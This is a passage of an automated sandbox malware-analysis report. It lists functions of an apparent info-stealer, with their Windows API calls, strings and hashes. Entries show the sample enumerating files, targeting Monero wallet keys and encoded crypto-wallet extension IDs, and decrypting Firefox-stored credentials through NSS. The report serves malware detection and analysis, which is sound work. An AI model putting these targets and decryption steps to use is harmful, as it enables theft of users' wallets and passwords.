lstrlen.KERNEL32(?), ref: 009346E5
lstrlen.KERNEL32(?), ref: 009346F6

Strings

%s\*, xrefs: 0093459A
%s\%s, xrefs: 0093461B
wcGhmY2NlbWNpZ25oaWZwamthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmtmZ3BwZGxibWxtbnB, xrefs: 00934579

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*$wcGhmY2NlbWNpZ25oaWZwamthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmtmZ3BwZGxibWxtbnB
API String ID: 671575355-3452487924
Opcode ID: 9e1d6e09608c9d14ca4cb08d6dc3716e208fe2df88fa3657077c4bebfe4eec17
Instruction ID: ed534c28a1aff7670ef7197b72e3cb11dd9a725ef90b46d66061527048def42b
Opcode Fuzzy Hash: 9e1d6e09608c9d14ca4cb08d6dc3716e208fe2df88fa3657077c4bebfe4eec17
Instruction Fuzzy Hash: F3514A715502189BCB24EB70DC89FEE777CAB94700F404598F609A7191EF75EB848F91

Function 6C66FD00 Relevance: 31.4, APIs: 17, Strings: 3, Instructions: 1360memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C6DE7B8), ref: 6C66FF81
LeaveCriticalSection.KERNEL32(6C6DE7B8), ref: 6C67022D
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C670240
EnterCriticalSection.KERNEL32(6C6DE768), ref: 6C67025B
LeaveCriticalSection.KERNEL32(6C6DE768), ref: 6C67027B

Strings

MOZ_RELEASE_ASSERT(mNode), xrefs: 6C66FE99, 6C66FEB7, 6C66FED3, 6C670DB8, 6C670DD3, 6C6719B4
: (malloc) Error in VirtualFree(), xrefs: 6C670D67, 6C670D7B, 6C670DAC
<jemalloc>, xrefs: 6C670D62, 6C670D76, 6C670DA7

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_RELEASE_ASSERT(mNode)
API String ID: 618468079-3577267516
Opcode ID: 498597fbc7d55b41ee2c801f08bbf64f5f214a6b7b6fbc0117505a98ef7eea40
Instruction ID: e8992d00596065b3b005aafba80a9a854203beed125ea67ceae0e362e91cc08c
Opcode Fuzzy Hash: 498597fbc7d55b41ee2c801f08bbf64f5f214a6b7b6fbc0117505a98ef7eea40
Instruction Fuzzy Hash: 01C20271A057418FD724CF28C590756BBE1BF85328F28CA6DE4698B7D5C732E801CBA9

Function 0092ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0092ED3E
FindFirstFileA.KERNEL32(?,?), ref: 0092ED55
StrCmpCA.SHLWAPI(?,00941538), ref: 0092EDAB
StrCmpCA.SHLWAPI(?,0094153C), ref: 0092EDC1
FindNextFileA.KERNEL32(000000FF,?), ref: 0092F2AE
FindClose.KERNEL32(000000FF), ref: 0092F2C3

Strings

%s\*.*, xrefs: 0092ED32

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*
API String ID: 180737720-1013718255
Opcode ID: 5b17c45f95c64911edebe31f2dd02527ec6bab6e8657e8b4c5283a0f0fc20c01
Instruction ID: ee2f060bc2c029bf9818057c413013e7b60a9ba259f985f07235bb39504dccea
Opcode Fuzzy Hash: 5b17c45f95c64911edebe31f2dd02527ec6bab6e8657e8b4c5283a0f0fc20c01
Instruction Fuzzy Hash: 89E1C272911118AADB54FB60DC92FEE737CAF94300F4045E9B54A62092EF346F8ACF56

Function 6C67D4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D4F2
LeaveCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D50B

Part of subcall function 6C65CFE0: EnterCriticalSection.KERNEL32(6C6DE784), ref: 6C65CFF6
Part of subcall function 6C65CFE0: LeaveCriticalSection.KERNEL32(6C6DE784), ref: 6C65D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D52E
EnterCriticalSection.KERNEL32(6C6DE7DC), ref: 6C67D690
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C67D6A6
LeaveCriticalSection.KERNEL32(6C6DE7DC), ref: 6C67D712
LeaveCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D751
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C67D7EA

Strings

: (malloc) Error initializing arena, xrefs: 6C67D82C
<jemalloc>, xrefs: 6C67D827

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
String ID: : (malloc) Error initializing arena$<jemalloc>
API String ID: 2690322072-3894294050
Opcode ID: 87ce9bd5f3aff67cde588faddb11a27f5e74e8bb6ca9c4638c38cf2c6ce1d661
Instruction ID: 8e5b2784bc4e44ae93db445447a53da21b8530f242c60e12b6fd494aaa9eed1f
Opcode Fuzzy Hash: 87ce9bd5f3aff67cde588faddb11a27f5e74e8bb6ca9c4638c38cf2c6ce1d661
Instruction Fuzzy Hash: 1991C471A047018FD764CF29C49076AB7E1EB89318F158D2EE55AC7B81D734E844CBAA

Function 00CEE19D Relevance: 15.3, Strings: 11, Instructions: 1598COMMON

Download Yara Rule

Strings

A>O, xrefs: 00CEF40E
,*^#, xrefs: 00CEF024
l>~, xrefs: 00CEEAB8
G~, xrefs: 00CEEAF5
B@C, xrefs: 00CEE65F
x\x, xrefs: 00CEE3AB
% {z, xrefs: 00CEE3A6
=>O, xrefs: 00CEF409
QH?u, xrefs: 00CEE6C3
G~, xrefs: 00CEEB06
`*?g, xrefs: 00CEF016

Memory Dump Source

Source File: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID:
String ID: % {z$,*^#$=>O$A>O$B@C$G~$G~$QH?u$`*?g$l>~$x\x
API String ID: 0-4079996034
Opcode ID: e48e1a2ef6499b2ad07be809470376ddb7442c70bfa90708fd101a9a60a14514
Instruction ID: 95834ad801c2b3f64ccee5042b7f534563b95c662616dcb9a7029a6c7aa837b4
Opcode Fuzzy Hash: e48e1a2ef6499b2ad07be809470376ddb7442c70bfa90708fd101a9a60a14514
Instruction Fuzzy Hash: 31B215F390C204AFE3046E29EC8567ABBE9EF94720F16493DEAC5C3740EA3558058797

Function 0092DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,006F9228,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12

Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00940C2E), ref: 0092DE5E
StrCmpCA.SHLWAPI(?,009414C8), ref: 0092DEAE
StrCmpCA.SHLWAPI(?,009414CC), ref: 0092DEC4
FindNextFileA.KERNEL32(000000FF,?), ref: 0092E3E0
FindClose.KERNEL32(000000FF), ref: 0092E3F2

Strings

\*.*, xrefs: 0092DE26

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: \*.*
API String ID: 2325840235-1173974218
Opcode ID: 52c0f252137ea1a07cd6f0599cdafe3c22f57952b89828486a1927b37de9cc77
Instruction ID: 82f16b95504cd89654d64577e8b493f15f8beb8abcb6976ed1e4cc870d20941e
Opcode Fuzzy Hash: 52c0f252137ea1a07cd6f0599cdafe3c22f57952b89828486a1927b37de9cc77
Instruction Fuzzy Hash: D0F1BF71814118AADB19FB60DC96FEE7378BF94300F8041D9B54A62091EF346F8ACF66

Function 0092C820 Relevance: 13.6, APIs: 9, Instructions: 95stringencryptionCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0092C871
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0092C87C
PK11_GetInternalKeySlot.NSS3 ref: 0092C88A
PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0092C8A5
PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0092C8EB
lstrcat.KERNEL32(?,00940B46), ref: 0092C943
lstrcat.KERNEL32(?,00940B47), ref: 0092C957
PK11_FreeSlot.NSS3(?), ref: 0092C961
lstrcat.KERNEL32(?,00940B4E), ref: 0092C978

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlen
String ID:
API String ID: 3356303513-0
Opcode ID: b8d5cdcc02342e84aa23b5f9ad48d713c7521c5c54570b33e60873c67added81
Instruction ID: 8bf792fac4e182710b7cd0b943954aad68313d7e3583310d293f86542f1a7b50
Opcode Fuzzy Hash: b8d5cdcc02342e84aa23b5f9ad48d713c7521c5c54570b33e60873c67added81
Instruction Fuzzy Hash: CA4151B590421ADBCF10DFA4DD89BEEB7B8BB44304F1045A8E609A72C0DB745A84CF91

Function 00CEC744 Relevance: 12.8, Strings: 9, Instructions: 1548COMMON

Download Yara Rule

Strings

],, xrefs: 00CECE03
O45, xrefs: 00CECDF8
i1G_, xrefs: 00CED215
wm~, xrefs: 00CED002
{;;\, xrefs: 00CED724
6f{[, xrefs: 00CECFF2
Kom, xrefs: 00CECF05
qs^, xrefs: 00CEC864
;_, xrefs: 00CED183

Memory Dump Source

Source File: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ;_$ Kom$ qs^$6f{[$O45$],$i1G_$wm~${;;\
API String ID: 0-570330986
Opcode ID: 87534d94012a4dd1b5c7ac9c26afe831a96a91f8f1ba617873a0b2eb7ee62ae5
Instruction ID: ba74915d6778a5757261c9c67131326484d6cb323f0dcf9a9abc843ae7fbd357
Opcode Fuzzy Hash: 87534d94012a4dd1b5c7ac9c26afe831a96a91f8f1ba617873a0b2eb7ee62ae5
Instruction Fuzzy Hash: 00A214F360C204AFE3046E2DEC8567AB7E9EF94720F1A493DEAC483744E67598058797

Function 6C6A2C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON

Download Yara Rule

APIs

